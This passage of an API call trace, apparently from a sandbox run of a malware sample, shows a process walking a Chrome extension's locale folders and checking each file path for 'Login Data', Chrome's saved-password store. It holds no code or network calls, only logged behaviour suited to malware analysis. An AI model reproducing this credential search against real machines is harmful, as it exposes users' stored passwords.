HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\*.*" [0161.712] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86585990, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86585990, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86585990, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.712] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.712] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86585990, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86585990, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86585990, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0161.712] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.712] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.712] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86585990, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86585990, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xdd, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.713] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja") returned 137 [0161.713] lstrlenW (lpString="\\") returned 1 [0161.713] GetProcessHeap () returned 0x8e0000 [0161.713] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.713] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja" [0161.713] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\" [0161.713] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\") returned 138 [0161.713] lstrlenW (lpString="messages.json") returned 13 [0161.713] GetProcessHeap () returned 0x8e0000 [0161.713] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.713] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\" [0161.713] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json" [0161.713] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.713] GetProcessHeap () returned 0x8e0000 [0161.713] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.713] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json", lpSrch="Login Data") returned 0x0 [0161.713] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.713] GetProcessHeap () returned 0x8e0000 [0161.713] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.713] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86585990, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86585990, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xdd, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.713] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.713] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.713] GetProcessHeap () returned 0x8e0000 [0161.713] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.713] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.713] GetProcessHeap () returned 0x8e0000 [0161.713] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.713] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86585990, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86585990, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86585990, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="ko", cAlternateFileName="")) returned 1 [0161.713] lstrcmpiW (lpString1="ko", lpString2=".") returned 1 [0161.713] lstrcmpiW (lpString1="ko", lpString2="..") returned 1 [0161.713] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.713] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.714] lstrlenW (lpString="\\") returned 1 [0161.714] GetProcessHeap () returned 0x8e0000 [0161.714] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.714] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" [0161.714] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.714] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned 135 [0161.714] lstrlenW (lpString="ko") returned 2 [0161.714] GetProcessHeap () returned 0x8e0000 [0161.714] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.714] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.714] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\", lpString2="ko" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko" [0161.714] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.714] GetProcessHeap () returned 0x8e0000 [0161.714] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.714] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko") returned 137 [0161.714] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko") returned 137 [0161.714] lstrlenW (lpString="\\*.*") returned 4 [0161.714] GetProcessHeap () returned 0x8e0000 [0161.714] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.714] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko" [0161.714] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\*.*" [0161.714] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86585990, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86585990, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86585990, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.715] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.715] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86585990, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86585990, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86585990, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0161.715] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.715] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.715] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86585990, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86585990, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xda, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.715] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko") returned 137 [0161.715] lstrlenW (lpString="\\") returned 1 [0161.715] GetProcessHeap () returned 0x8e0000 [0161.715] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.715] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko" [0161.715] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\" [0161.715] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\") returned 138 [0161.715] lstrlenW (lpString="messages.json") returned 13 [0161.715] GetProcessHeap () returned 0x8e0000 [0161.715] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.715] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\" [0161.715] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json" [0161.715] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.715] GetProcessHeap () returned 0x8e0000 [0161.715] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.715] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json", lpSrch="Login Data") returned 0x0 [0161.715] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.716] GetProcessHeap () returned 0x8e0000 [0161.716] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.716] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86585990, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86585990, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xda, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.716] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.716] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.716] GetProcessHeap () returned 0x8e0000 [0161.716] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.716] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.716] GetProcessHeap () returned 0x8e0000 [0161.716] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.716] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x865abaf0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x865abaf0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x865abaf0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="lt", cAlternateFileName="")) returned 1 [0161.716] lstrcmpiW (lpString1="lt", lpString2=".") returned 1 [0161.716] lstrcmpiW (lpString1="lt", lpString2="..") returned 1 [0161.716] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.716] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.716] lstrlenW (lpString="\\") returned 1 [0161.716] GetProcessHeap () returned 0x8e0000 [0161.716] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.716] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" [0161.716] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.716] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned 135 [0161.716] lstrlenW (lpString="lt") returned 2 [0161.716] GetProcessHeap () returned 0x8e0000 [0161.716] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.716] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.716] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\", lpString2="lt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt" [0161.716] VirtualQuery (in: 